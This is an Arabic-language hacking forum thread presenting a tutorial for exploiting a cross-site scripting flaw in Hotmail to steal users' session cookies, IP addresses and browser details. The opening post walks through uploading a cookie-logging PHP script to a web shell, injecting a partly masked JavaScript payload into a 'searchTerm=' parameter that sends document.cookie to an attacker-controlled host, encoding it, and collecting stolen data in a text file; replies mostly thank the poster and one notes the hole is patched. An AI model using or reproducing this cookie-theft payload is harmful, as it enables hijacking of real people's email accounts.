![]()  |  
 
 شرح واسغلال ثغره الهوتميل .. وسحب الكوكيز الايميل \HACK HOTMAIL XSS  1 مرفق  بسم الله الرحمن الرحيم.. http://www.almlf.com/get-7-2011-almlf_com_pukuk0m2.png طيب تمام اول شي نحمل ملف co.php http://pastebin.com/mZCMRcGC طيب نرفعه على الشل تممام الحين نشوف الاستغلال.. كود PHP:    /patch patch=اسم المجلد الحين كل ماعلينا هوا تشفير الكود راح نشفر من بعد كلمة searchTerm= من بعد اليساوي.. نشوف يعني مثلآ كذا "><object data="javascript:********.location='http://www.site.com/co.php?c='.concat(escape(********.******));"></script> طيب راح نشفر بمقاياس http full عن طريق برنامج coder نفتحه ونحط الكود ونشوف.. http://www.almlf.com/get-7-2011-almlf_com_jrdfjuav.png تم تشفير الكود الحين نبلدله بدل الكود الاول.. يعني الكود الاول من بعد اليساوي راح نحط هاد الي تشفر .. الحين نعمل صفحه بلغه HtM نشوف.. من الشل.. http://www.almlf.com/get-7-2011-almlf_com_jiy46r37.png الحين نضع داخل الملف.. http://www.almlf.com/get-7-2011-almlf_com_ktmkquyw.png الكود كود:  <htm>والكود الثانيه.. نضع بعد src كود الاستغلال الي عملنها قبل يصبح مثل كذا,, كود PHP:    الحين ندخل على صفحه thmooryالي عملته.. تابعو.. http://www.almlf.com/get-7-2011-almlf_com_7b9f78vq.png تمام الحين تم سحب الاي بي..+ الكوكيز +نوع المتصفح ونشوف .. نرجع على المجلد الي كنا رافعين فيه co.php وراح نلقى ملف تكست اسمو ok.txt http://www.almlf.com/get-7-2011-almlf_com_yrmtfcww.png انتهى الشرح اتمنى انو عجبكم الاكواد مرفقه شان الموقع يحجبهم..  |  
 
 نجرب ، يابطــل ، ونشوف ، ونرد لـك ، خبـر   ^_^  |  
 
 ممم ما شاء الله بعد التجريب لي رجعة و مشكوور مسبقا  |  
 
 تم ترقيع ، هذه الثغره ، ولا ينفع ،  والموضوع موجود بقوقل ،   يعيطيك الف ، عافيه ع الشرح ، ياكنق  |  
 
 نعم اتغرة مرة عليها ايام ولا بد من ان هوتميل لم تغفل عنها   مشكوووور عل بدل جهد بتوفيق  |  
 
 مشكور ياغالي على الشرح الرائع  بارك الله فيك  |  
 
 تسلم يا غالي  رح اجربها ..  |  
 
 نجرب و نشوف  شكرا لك اخيي  |  
 
 رد: شرح واسغلال ثغره الهوتميل .. وسحب الكوكيز الايميل \HACK HOTMAIL XSS  قديمه ولكن لك الشكر   |  
 
 رد: شرح واسغلال ثغره الهوتميل .. وسحب الكوكيز الايميل \HACK HOTMAIL XSS  a@mohmal.coma@mohmal.coma@mohmal.com   |  
 
 رد: شرح واسغلال ثغره الهوتميل .. وسحب الكوكيز الايميل \HACK HOTMAIL XSS  مـــشكوور اخوي   انا بصراحه من زمان ودي اعرف الثغره هذي تحياتي لك اخوي تقبل مروري  |  
 
 رد: شرح واسغلال ثغره الهوتميل .. وسحب الكوكيز الايميل \HACK HOTMAIL XSS  شكرا لك  لكن اشكل الكلمات مشفره  |  
 
 رد: شرح واسغلال ثغره الهوتميل .. وسحب الكوكيز الايميل \HACK HOTMAIL XSS  i need it :D   |  
 
 رد: شرح واسغلال ثغره الهوتميل .. وسحب الكوكيز الايميل \HACK HOTMAIL XSS  tnxxxx   |  
 
 رد: شرح واسغلال ثغره الهوتميل .. وسحب الكوكيز الايميل \HACK HOTMAIL XSS  thanxxxxxxxxxxxxxx   |  
| الساعة الآن 10:59 AM | 
 
	[ vBspiders.Com Network ]